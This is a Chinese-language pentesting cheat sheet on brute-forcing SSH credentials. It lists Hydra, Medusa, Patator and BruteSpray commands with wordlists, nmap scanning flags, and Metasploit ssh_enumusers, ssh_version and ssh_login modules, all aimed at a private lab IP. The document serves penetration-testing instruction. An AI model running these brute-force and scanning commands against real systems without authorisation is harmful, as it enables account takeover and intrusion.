Hydra是世界顶级密码暴力破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。
# hydra -l root -P pass.list 192.168.75.158 ssh
# hydra -L userlist.txt -P passlist.txt 192.168.75.158 ssh
#hydra -L userlist.txt -P passlist.txt -M hostlist.txt ssh
#hydra -l root -P pass.list 192.168.75.158 ssh -o hydrassh.txt
Medusa[美杜莎]是一个速度快,支持大规模并行,模块化,爆破登录。可以同时对多个主机、用户或密码执行强力测试。Medusa和Hydra一样,同样于在线密码破解工具。不同的是,Medusa的稳定性相较于Hydra要好很多,但其支持模块要比Hydra少一些。
# medusa -M ssh -u root -P pass.list -h 192.168.75.158
# medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt
# medusa -M ssh -u root -P pass.list -h 192.168.75.158 -O medusa.txt
查看模块:#patator
查看模块具体用法:#patator --ssh_login --help
# patator ssh_login host=192.168.75.158 user=root password=FILE0 0=passlist.txt
# patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list
# patator ssh_login host=192.168.75.158 user=FILE0 0=user.list password=FILE1 1=pass.list -x ignore:mesg='Authentication failed.'
BrutesPray是一款基于nmap扫描输出的gnmap/XML文件。自动调用Medusa对服务进行爆破。
# apt-get update
# apt-get install brutespray
-f或 --flie 接一个文件名, 解析nmap输出的 GNMAP 或者 XML 文件
-s或 --service 接一个服务名, 指定要攻击的服务
-t 或 --threads 接一数值,指定线程数
-T 或 --hosts接一数值,指定同时测试的主机数
-U 或 --userlist 接一个用户字典文件
-P 或 --passlist 接一个密码字典文件
-u 或 --username 接用户名,指定一个用户名进行爆破
-p 或 --password 接一个密码,指定一个密码进行爆破
-c 或 --continuous 成功之后继续爆破
-I 或 --interactive 交互模式
nmap -ip地址
nmap -v ip地址 显示扫描过程
nmap -p80,8080 指定端口扫描
nmap -A ip 综合扫描
nmap -O ip 扫描主机操作系统
nmap -iL 文件 扫描指定文件中的IP
nmap -sS SYN扫描 使用SYN半开放扫描
nmap -sT TCP扫描 扫描开放了TCP端口的设备
nmap -F 快速扫描
nmap -sV 版本检测 用于扫描目标主机服务版本号. 探测打开的端口以确定服务/版本信息
nmap -sR RPC扫描
nmap -sU 探测那些UDP端口开放
nmap -sO 用于判断目标主机上使用的是神魔协议 探测目标主机支持哪些IP协议
nmap -oX 表示以xml的格式输出结果到以文件
-P0跳过ping的探测,可以加快扫描速度.
-sP ping扫描
-T [0-6]:设置定时模板(越高越快)
# nmap -sV -p 22 192.168.75.0/24 -oX nmaplive.xml
# brutespray --file nmaplive.xml -u root -P pass.list -c
# cat /root/brutespray-output/22-ssh-success.txt 查看爆破成功的文件内容
Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。
#msfconsole
msf > search ssh
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > show options
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.75.158 设置目标主机
msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file /root/user.list
msf auxiliary(scanner/ssh/ssh_enumusers) > set threads 10
msf auxiliary(scanner/ssh/ssh_enumusers) > show options
msf auxiliary(scanner/ssh/ssh_enumusers) > run
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > show options
msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.75.158
msf auxiliary(scanner/ssh/ssh_version) > show options
msf auxiliary(scanner/ssh/ssh_version) > run
msf auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > show options
msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.75.158
msf auxiliary(scanner/ssh/ssh_login) > set pass_file /root/pass.list
msf auxiliary(scanner/ssh/ssh_login) > set user_file /root/user.list
msf auxiliary(scanner/ssh/ssh_login) > run